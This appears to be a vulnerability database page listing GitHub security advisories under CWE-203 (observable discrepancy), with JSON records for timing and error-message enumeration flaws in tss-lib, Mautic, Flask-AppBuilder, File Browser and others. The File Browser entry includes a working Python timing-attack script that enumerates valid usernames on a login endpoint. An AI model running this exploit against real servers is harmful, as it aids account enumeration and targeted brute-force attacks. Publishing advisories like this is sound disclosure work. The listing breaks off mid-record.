Common Weakness Enumeration

CWE-203

Allowed

Observable Discrepancy

Abstraction: Base · Status: Incomplete

The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor.

836 vulnerabilities reference this CWE, most recent first.

GHSA-3W84-4MJC-RJW7

Vulnerability from github – Published: 2023-04-21 18:30 – Updated: 2025-02-05 19:42
VLAI
Summary
IO FinNet tss-lib vulnerable to timing attack from non-constant time scalar multiplication
Details

io.finnet tss-lib before 2.0.0 can leak a secret key via a timing side-channel attack because it relies on the scalar-multiplication implementation in Go crypto/elliptic, which is not constant time (there is an if statement in a loop). One leak is in ecdsa/keygen/round_2.go. (bnb-chain/tss-lib and thorchain/tss are also affected.)

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/bnb-chain/tss-lib"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/binance-chain/tss-lib"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-26556"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-02-05T19:42:53Z",
    "nvd_published_at": "2023-04-21T18:15:07Z",
    "severity": "CRITICAL"
  },
  "details": "io.finnet tss-lib before 2.0.0 can leak a secret key via a timing side-channel attack because it relies on the scalar-multiplication implementation in Go crypto/elliptic, which is not constant time (there is an if statement in a loop). One leak is in ecdsa/keygen/round_2.go. (bnb-chain/tss-lib and thorchain/tss are also affected.)",
  "id": "GHSA-3w84-4mjc-rjw7",
  "modified": "2025-02-05T19:42:53Z",
  "published": "2023-04-21T18:30:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26556"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bnb-chain/tss-lib/issues/44"
    },
    {
      "type": "WEB",
      "url": "https://github.com/IoFinnet/tss-lib/releases/tag/v2.0.0"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/bnb-chain/tss-lib"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bnb-chain/tss-lib/releases/tag/v2.0.0"
    },
    {
      "type": "WEB",
      "url": "https://github.com/bnb-chain/tss-lib/tree/v1.3.5"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/thorchain/tss/tss-lib/-/tags/v0.1.3"
    },
    {
      "type": "WEB",
      "url": "https://medium.com/@iofinnet/security-disclosure-for-ecdsa-and-eddsa-threshold-signature-schemes-4e969af7155b"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2023-1732"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "IO FinNet tss-lib vulnerable to timing attack from non-constant time scalar multiplication"
}

GHSA-3WQ4-HQW7-6X4F

Vulnerability from github – Published: 2025-11-24 18:31 – Updated: 2025-11-24 21:30
VLAI
Details

An issue in Austrian Academy of Sciences (AW) Austrian Archaeological Institute OpenAtlas v.8.12.0 allows a remote attacker to obtain sensitive information via the login error messages

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-56423"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-11-24T16:15:49Z",
    "severity": "MODERATE"
  },
  "details": "An issue in Austrian Academy of Sciences (AW) Austrian Archaeological Institute OpenAtlas v.8.12.0 allows a remote attacker to obtain sensitive information via the login error messages",
  "id": "GHSA-3wq4-hqw7-6x4f",
  "modified": "2025-11-24T21:30:59Z",
  "published": "2025-11-24T18:31:12Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-56423"
    },
    {
      "type": "WEB",
      "url": "https://www.sec4you-pentest.com/schwachstelle/openatlas-schwachstelle-user-enumeration"
    },
    {
      "type": "WEB",
      "url": "https://www.sec4you-pentest.com/schwachstellen"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3WW4-GG4F-JR7F

Vulnerability from github – Published: 2024-02-05 21:30 – Updated: 2026-02-27 20:57
VLAI
Summary
Python Cryptography package vulnerable to Bleichenbacher timing oracle attack
Details

A flaw was found in the python-cryptography package. This issue may allow a remote attacker to decrypt captured messages in TLS servers that use RSA key exchanges, which may lead to exposure of confidential or sensitive data.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "cryptography"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "42.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-50782"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203",
      "CWE-208",
      "CWE-385"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-02-05T23:04:50Z",
    "nvd_published_at": "2024-02-05T21:15:11Z",
    "severity": "HIGH"
  },
  "details": "A flaw was found in the python-cryptography package. This issue may allow a remote attacker to decrypt captured messages in TLS servers that use RSA key exchanges, which may lead to exposure of confidential or sensitive data.",
  "id": "GHSA-3ww4-gg4f-jr7f",
  "modified": "2026-02-27T20:57:35Z",
  "published": "2024-02-05T21:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50782"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pyca/cryptography/issues/9785"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2023-50782"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254432"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pyca/cryptography"
    },
    {
      "type": "WEB",
      "url": "https://www.couchbase.com/alerts"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Python Cryptography package vulnerable to Bleichenbacher timing oracle attack"
}

GHSA-424X-CXVH-WQ9P

Vulnerability from github – Published: 2025-05-28 17:38 – Updated: 2025-05-28 20:08
VLAI
Summary
Mautic allows user name enumeration due to response time difference on password reset form
Details

Summary

This advisory addresses a security vulnerability in Mautic related to the "Forget your password" functionality. This vulnerability could be exploited by unauthenticated users to enumerate valid usernames.

User Enumeration via Timing Attack: A user enumeration vulnerability exists in the "Forget your password" functionality. Differences in response times for existing and non-existing users, combined with a lack of request limiting, allow an attacker to determine the existence of usernames through a timing-based attack.

Mitigation

Please update to a version that addresses this timing vulnerability, where password reset responses are normalized to respond at the same time regardless of user existence.

Workarounds

None

If you have any questions or comments about this advisory: Email us at security@mautic.org

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "mautic/core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "4.4.16"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "mautic/core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0-alpha"
            },
            {
              "fixed": "5.2.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "mautic/core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "6.0.0-alpha"
            },
            {
              "fixed": "6.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-47057"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203",
      "CWE-204"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-05-28T17:38:46Z",
    "nvd_published_at": "2025-05-28T18:15:25Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nThis advisory addresses a security vulnerability in Mautic related to the \"Forget your password\" functionality. This vulnerability could be exploited by unauthenticated users to enumerate valid usernames.\n\nUser Enumeration via Timing Attack: A user enumeration vulnerability exists in the \"Forget your password\" functionality. Differences in response times for existing and non-existing users, combined with a lack of request limiting, allow an attacker to determine the existence of usernames through a timing-based attack.\n\n### Mitigation\nPlease update to a version that addresses this timing vulnerability, where password reset responses are normalized to respond at the same time regardless of user existence.\n\n### Workarounds\nNone\n\nIf you have any questions or comments about this advisory:\nEmail us at security@mautic.org",
  "id": "GHSA-424x-cxvh-wq9p",
  "modified": "2025-05-28T20:08:12Z",
  "published": "2025-05-28T17:38:46Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/mautic/mautic/security/advisories/GHSA-424x-cxvh-wq9p"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47057"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mautic/mautic"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Mautic allows user name enumeration due to response time difference on password reset form"
}

GHSA-4273-CCPV-PFM8

Vulnerability from github – Published: 2024-10-09 06:30 – Updated: 2024-11-05 00:31
VLAI
Details

i2p before 2.3.0 (Java) allows de-anonymizing the public IPv4 and IPv6 addresses of i2p hidden services (aka eepsites) via a correlation attack across the IPv4 and IPv6 addresses that occurs when a tunneled, replayed message has a behavior discrepancy (it may be dropped, or may result in a Wrong Destination response). An attack would take days to complete.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-36325"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-09T06:15:11Z",
    "severity": "LOW"
  },
  "details": "i2p before 2.3.0 (Java) allows de-anonymizing the public IPv4 and IPv6 addresses of i2p hidden services (aka eepsites) via a correlation attack across the IPv4 and IPv6 addresses that occurs when a tunneled, replayed message has a behavior discrepancy (it may be dropped, or may result in a Wrong Destination response). An attack would take days to complete.",
  "id": "GHSA-4273-ccpv-pfm8",
  "modified": "2024-11-05T00:31:27Z",
  "published": "2024-10-09T06:30:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36325"
    },
    {
      "type": "WEB",
      "url": "https://geti2p.net/en/blog/post/2023/06/25/new_release_2.3.0"
    },
    {
      "type": "WEB",
      "url": "https://i2pgit.org/i2p-hackers/i2p.i2p/-/commit/82aa4e19fbb37ca1bd752ec1b836120beec0985f"
    },
    {
      "type": "WEB",
      "url": "https://xeiaso.net/blog/CVE-2023-36325"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-434H-P4GX-JM89

Vulnerability from github – Published: 2021-05-27 18:38 – Updated: 2025-03-07 19:08
VLAI
Summary
Observable Response Discrepancy in Flask-AppBuilder
Details

Impact

User enumeration in database authentication in Flask-AppBuilder <= 3.2.3. Allows for a non authenticated user to enumerate existing accounts by timing the response time from the server when you are logging in.

Patches

Upgrade to 3.3.0

For more information

If you have any questions or comments about this advisory: * Open an issue in Flask-AppBuilder

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "Flask-AppBuilder"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-29621"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-05-25T20:21:31Z",
    "nvd_published_at": "2021-06-07T19:15:00Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\nUser enumeration in database authentication in Flask-AppBuilder \u003c= 3.2.3. Allows for a non authenticated user to enumerate existing accounts by timing the response time from the server when you are logging in.\n\n### Patches\nUpgrade to 3.3.0\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [Flask-AppBuilder](https://github.com/dpgaspar/Flask-AppBuilder)",
  "id": "GHSA-434h-p4gx-jm89",
  "modified": "2025-03-07T19:08:59Z",
  "published": "2021-05-27T18:38:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-434h-p4gx-jm89"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-29621"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dpgaspar/Flask-AppBuilder/commit/780bd0e8fbf2d36ada52edb769477e0a4edae580"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/dpgaspar/Flask-AppBuilder"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/flask-appbuilder/PYSEC-2021-90.yaml"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r466759f377651f0a690475d5a52564d0e786e82c08d5a5730a4f8352%40%3Cannounce.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r466759f377651f0a690475d5a52564d0e786e82c08d5a5730a4f8352@%3Cannounce.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r5b754118ba4e996adf03863705d34168bffec202da5c6bdc9bf3add5%40%3Cannounce.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r5b754118ba4e996adf03863705d34168bffec202da5c6bdc9bf3add5@%3Cannounce.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r91067f953906d93aaa1c69fe2b5472754019cc6bd4f1ba81349d62a0%40%3Ccommits.airflow.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://lists.apache.org/thread.html/r91067f953906d93aaa1c69fe2b5472754019cc6bd4f1ba81349d62a0@%3Ccommits.airflow.apache.org%3E"
    },
    {
      "type": "WEB",
      "url": "https://pypi.org/project/Flask-AppBuilder"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Observable Response Discrepancy in Flask-AppBuilder"
}

GHSA-43M8-RG5F-9PR8

Vulnerability from github – Published: 2022-05-13 01:38 – Updated: 2025-04-20 03:34
VLAI
Details

Revive Adserver before 3.2.3 suffers from Information Exposure Through Discrepancy. It is possible to check whether or not an email address was associated to one or more user accounts on a target Revive Adserver instance by examining the message printed by the password recovery system. Such information cannot however be used directly to log in to the system, which requires a username.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2016-9129"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-203"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-03-28T02:59:00Z",
    "severity": "MODERATE"
  },
  "details": "Revive Adserver before 3.2.3 suffers from Information Exposure Through Discrepancy. It is possible to check whether or not an email address was associated to one or more user accounts on a target Revive Adserver instance by examining the message printed by the password recovery system. Such information cannot however be used directly to log in to the system, which requires a username.",
  "id": "GHSA-43m8-rg5f-9pr8",
  "modified": "2025-04-20T03:34:57Z",
  "published": "2022-05-13T01:38:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-9129"
    },
    {
      "type": "WEB",
      "url": "https://github.com/revive-adserver/revive-adserver/commit/38223a841190bebd7a137c7bed84fbbcb2b0c2a5"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/98612"
    },
    {
      "type": "WEB",
      "url": "https://www.revive-adserver.com/security/revive-sa-2016-001"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-43MM-M3H2-3PRC

Vulnerability from github – Published: 2026-01-21 01:02 – Updated: 2026-01-21 01:02
VLAI
Summary
File Browser Vulnerable to Username Enumeration via Timing Attack in /api/login
Details

Summary

The JSONAuth.Auth function contains a logic flaw that allows unauthenticated attackers to enumerate valid usernames by measuring the response time of the /api/login endpoint.

Details

The vulnerability exists due to a "short-circuit" evaluation in the authentication logic. When a username is not found in the database, the function returns immediately. However, if the username does exist, the code proceeds to verify the password using bcrypt (users.CheckPwd), which is a computationally expensive operation designed to be slow.

This difference in execution path creates a measurable timing discrepancy:

Invalid User: ~1ms execution (Database lookup only). Valid User: ~50ms+ execution (Database lookup + Bcrypt hashing).

In auth/json.go:

// auth/json.go line 54
u, err := usr.Get(srv.Root, cred.Username)
// VULNERABILITY:
// If 'err != nil' (User not found), the OR condition short-circuits.
// The second part (!users.CheckPwd) is NEVER executed.
//
// If 'err == nil' (User found), the code MUST execute users.CheckPwd (Bcrypt).
if err != nil || !users.CheckPwd(cred.Password, u.Password) {
    return nil, os.ErrPermission
}

PoC

The following Python script automates the attack. It first calibrates the network latency using random (non-existent) users to establish a baseline/threshold, and then tests a list of target usernames. Valid users are detected when the response time exceeds the calculated threshold.

import requests
import time
import random
import string
import statistics
import argparse

CALIBRATION_SAMPLES = 20
ENDPOINT = "/api/login"

def generate_random_user(length=10):
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))

def measure_response_time(url, username):
    start = time.perf_counter()
    try:
        requests.post(url, json={"username": username, "password": "dummy_pass_123!"})
    except Exception as e:
        print(f"[!] Connection error: {e}")
        return 0
    return time.perf_counter() - start

def calibrate(url):
    print(f"\n[*] Calibrating with {CALIBRATION_SAMPLES} random users...")
    times = []

    print("    Progress: ", end="", flush=True)
    for _ in range(CALIBRATION_SAMPLES):
        random_user = generate_random_user()
        elapsed = measure_response_time(url, random_user)
        times.append(elapsed)
        print(".", end="", flush=True)
    print(" OK")

    mean = statistics.mean(times)
    try:
        stdev = statistics.stdev(times)
    except:
        stdev = 0.0

    threshold = mean + (5 * stdev) + 0.005

    print(f"    - Mean time (invalid users): {mean:.4f}s")
    print(f"    - Standard deviation: {stdev:.6f}s")
    print(f"    - Threshold set: {threshold:.4f}s")

    return threshold

def load_wordlist(wordlist_path):
    try:
        with open(wordlist_path, 'r', encoding='utf-8') as f:
            users = [line.strip() for line in f if line.strip()]
        return users
    except FileNotFoundError:
        print(f"[!] Wordlist not found: {wordlist_path}")
        exit(1)
    except Exception as e:
        print(f"[!] Error reading wordlist: {e}")
        exit(1)

def timing_attack(url, threshold, users):
    print(f"\n[*] Testing {len(users)} users from wordlist...")
    print("-" * 50)
    print(f"{'Username':<15} | {'Time':<10} | {'Status'}")
    print("-" * 50)

    found = []

    for user in users:
        elapsed = measure_response_time(url, user)

        if elapsed > threshold:
            status = ">> VALID <<"
            found.append(user)
        else:
            status = "invalid"

        print(f"{user:<15} | {elapsed:.4f}s | {status}")

    return found

def main():
    parser = argparse.ArgumentParser(description='FileBrowser timing attack exploit')
    parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., http://localhost:8080)')
    parser.add_argument('-w', '--wordlist', required=True, help='Path to wordlist file')
    args = parser.parse_args()

    target_url = args.url.rstrip('/') + ENDPOINT

    print("=== FILEBROWSER TIMING ATTACK ===\n")
    print(f"[*] Target: {target_url}")
    print(f"[*] Wordlist: {args.wordlist}")

    try:
        threshold = calibrate(target_url)
        users = load_wordlist(args.wordlist)
        print(f"\n[*] Loaded {len(users)} users from wordlist")
        print("[*] Starting attack...")

        valid_users = timing_attack(target_url, threshold, users)

        print("\n" + "="*50)
        print(f"SUMMARY: {len(valid_users)} valid users found")
        if valid_users:
            for u in valid_users:
                print(f"  -> {u}")
        print("="*50)

    except KeyboardInterrupt:
        print("\n[!] Attack cancelled")

if __name__ == "__main__":
    main()

For example, in this case, I have guchihacker as the only valid user in the application. image

I am going to use the exploit to list valid users. image As we can see, the user guchihacker has been confirmed as a valid user by comparing the server response time.

Impact

An unauthenticated remote attacker can enumerate valid usernames. This significantly weakens the security posture by facilitating targeted brute-force attacks or credential stuffing against specific, known-valid accounts (e.g., 'admin', 'root', employee names).

I remain at your disposal for any questions you may have on this matter. Thank you very much.

Sincerely, Felix Sanchez (GUCHI)

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/filebrowser/filebrowser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.11.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/filebrowser/filebrowser/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.55.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-23849"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203",
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-21T01:02:17Z",
    "nvd_published_at": "2026-01-19T21:15:51Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nThe JSONAuth.Auth function contains a logic flaw that allows unauthenticated attackers to enumerate valid usernames by measuring the response time of the /api/login endpoint.\n\n### Details\nThe vulnerability exists due to a \"short-circuit\" evaluation in the authentication logic. When a username is not found in the database, the function returns immediately. However, if the username does exist, the code proceeds to verify the password using bcrypt (users.CheckPwd), which is a computationally expensive operation designed to be slow.\n\nThis difference in execution path creates a measurable timing discrepancy:\n\nInvalid User: ~1ms execution (Database lookup only).\nValid User: ~50ms+ execution (Database lookup + Bcrypt hashing).\n\nIn auth/json.go:\n```go\n// auth/json.go line 54\nu, err := usr.Get(srv.Root, cred.Username)\n// VULNERABILITY:\n// If \u0027err != nil\u0027 (User not found), the OR condition short-circuits.\n// The second part (!users.CheckPwd) is NEVER executed.\n//\n// If \u0027err == nil\u0027 (User found), the code MUST execute users.CheckPwd (Bcrypt).\nif err != nil || !users.CheckPwd(cred.Password, u.Password) {\n    return nil, os.ErrPermission\n}\n```\n### PoC\nThe following Python script automates the attack. It first calibrates the network latency using random (non-existent) users to establish a baseline/threshold, and then tests a list of target usernames. Valid users are detected when the response time exceeds the calculated threshold.\n\n```python\nimport requests\nimport time\nimport random\nimport string\nimport statistics\nimport argparse\n\nCALIBRATION_SAMPLES = 20\nENDPOINT = \"/api/login\"\n\ndef generate_random_user(length=10):\n    return \u0027\u0027.join(random.choices(string.ascii_lowercase + string.digits, k=length))\n\ndef measure_response_time(url, username):\n    start = time.perf_counter()\n    try:\n        requests.post(url, json={\"username\": username, \"password\": \"dummy_pass_123!\"})\n    except Exception as e:\n        print(f\"[!] Connection error: {e}\")\n        return 0\n    return time.perf_counter() - start\n\ndef calibrate(url):\n    print(f\"\\n[*] Calibrating with {CALIBRATION_SAMPLES} random users...\")\n    times = []\n    \n    print(\"    Progress: \", end=\"\", flush=True)\n    for _ in range(CALIBRATION_SAMPLES):\n        random_user = generate_random_user()\n        elapsed = measure_response_time(url, random_user)\n        times.append(elapsed)\n        print(\".\", end=\"\", flush=True)\n    print(\" OK\")\n    \n    mean = statistics.mean(times)\n    try:\n        stdev = statistics.stdev(times)\n    except:\n        stdev = 0.0\n    \n    threshold = mean + (5 * stdev) + 0.005\n    \n    print(f\"    - Mean time (invalid users): {mean:.4f}s\")\n    print(f\"    - Standard deviation: {stdev:.6f}s\")\n    print(f\"    - Threshold set: {threshold:.4f}s\")\n    \n    return threshold\n\ndef load_wordlist(wordlist_path):\n    try:\n        with open(wordlist_path, \u0027r\u0027, encoding=\u0027utf-8\u0027) as f:\n            users = [line.strip() for line in f if line.strip()]\n        return users\n    except FileNotFoundError:\n        print(f\"[!] Wordlist not found: {wordlist_path}\")\n        exit(1)\n    except Exception as e:\n        print(f\"[!] Error reading wordlist: {e}\")\n        exit(1)\n\ndef timing_attack(url, threshold, users):\n    print(f\"\\n[*] Testing {len(users)} users from wordlist...\")\n    print(\"-\" * 50)\n    print(f\"{\u0027Username\u0027:\u003c15} | {\u0027Time\u0027:\u003c10} | {\u0027Status\u0027}\")\n    print(\"-\" * 50)\n    \n    found = []\n    \n    for user in users:\n        elapsed = measure_response_time(url, user)\n        \n        if elapsed \u003e threshold:\n            status = \"\u003e\u003e VALID \u003c\u003c\"\n            found.append(user)\n        else:\n            status = \"invalid\"\n            \n        print(f\"{user:\u003c15} | {elapsed:.4f}s | {status}\")\n        \n    return found\n\ndef main():\n    parser = argparse.ArgumentParser(description=\u0027FileBrowser timing attack exploit\u0027)\n    parser.add_argument(\u0027-u\u0027, \u0027--url\u0027, required=True, help=\u0027Target URL (e.g., http://localhost:8080)\u0027)\n    parser.add_argument(\u0027-w\u0027, \u0027--wordlist\u0027, required=True, help=\u0027Path to wordlist file\u0027)\n    args = parser.parse_args()\n    \n    target_url = args.url.rstrip(\u0027/\u0027) + ENDPOINT\n    \n    print(\"=== FILEBROWSER TIMING ATTACK ===\\n\")\n    print(f\"[*] Target: {target_url}\")\n    print(f\"[*] Wordlist: {args.wordlist}\")\n    \n    try:\n        threshold = calibrate(target_url)\n        users = load_wordlist(args.wordlist)\n        print(f\"\\n[*] Loaded {len(users)} users from wordlist\")\n        print(\"[*] Starting attack...\")\n        \n        valid_users = timing_attack(target_url, threshold, users)\n        \n        print(\"\\n\" + \"=\"*50)\n        print(f\"SUMMARY: {len(valid_users)} valid users found\")\n        if valid_users:\n            for u in valid_users:\n                print(f\"  -\u003e {u}\")\n        print(\"=\"*50)\n        \n    except KeyboardInterrupt:\n        print(\"\\n[!] Attack cancelled\")\n\nif __name__ == \"__main__\":\n    main()\n```\n\nFor example, in this case, I have guchihacker as the only valid user in the application.\n\u003cimg width=\"842\" height=\"310\" alt=\"image\" src=\"https://github.com/user-attachments/assets/b3caf11e-279c-4532-aa96-fd20cda153a3\" /\u003e\n\nI am going to use the exploit to list valid users.\n\u003cimg width=\"628\" height=\"716\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f9d93e8e-e773-42a5-8a06-bc6bcc2a71fa\" /\u003e\nAs we can see, the user guchihacker has been confirmed as a valid user by comparing the server response time.\n\n### Impact\nAn unauthenticated remote attacker can enumerate valid usernames. This significantly weakens the security posture by facilitating targeted brute-force attacks or credential stuffing against specific, known-valid accounts (e.g., \u0027admin\u0027, \u0027root\u0027, employee names).\n\n\nI remain at your disposal for any questions you may have on this matter. Thank you very much.\n\nSincerely, [Felix Sanchez (GUCHI)](https://guchihacker.github.io/)",
  "id": "GHSA-43mm-m3h2-3prc",
  "modified": "2026-01-21T01:02:17Z",
  "published": "2026-01-21T01:02:17Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-43mm-m3h2-3prc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23849"
    },
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/commit/24781badd413ee20333aba5cce1919d676e01889"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/filebrowser/filebrowser"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "File Browser Vulnerable to Username Enumeration via Timing Attack in /api/login"
}

GHSA-443M-F58X-JX9J

Vulnerability from github – Published: 2026-07-01 00:34 – Updated: 2026-07-01 00:34
VLAI
Details

Capgo before 12.128.2 contains an information disclosure vulnerability in the public.invite_user_to_org RPC function that allows unauthenticated attackers to enumerate organization existence by observing distinct error responses. Attackers can call the SECURITY DEFINER function with a publishable API key to determine if an organization ID exists based on NO_ORG versus NO_RIGHTS responses, enabling tenant enumeration attacks.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-56327"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-203"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-30T23:17:30Z",
    "severity": "MODERATE"
  },
  "details": "Capgo before 12.128.2 contains an information disclosure vulnerability in the public.invite_user_to_org RPC function that allows unauthenticated attackers to enumerate organization existence by observing distinct error responses. Attackers can call the SECURITY DEFINER function with a publishable API key to determine if an organization ID exists based on NO_ORG versus NO_RIGHTS responses, enabling tenant enumeration attacks.",
  "id": "GHSA-443m-f58x-jx9j",
  "modified": "2026-07-01T00:34:13Z",
  "published": "2026-07-01T00:34:13Z",
  "references": [
    {
      "type": "WEB",
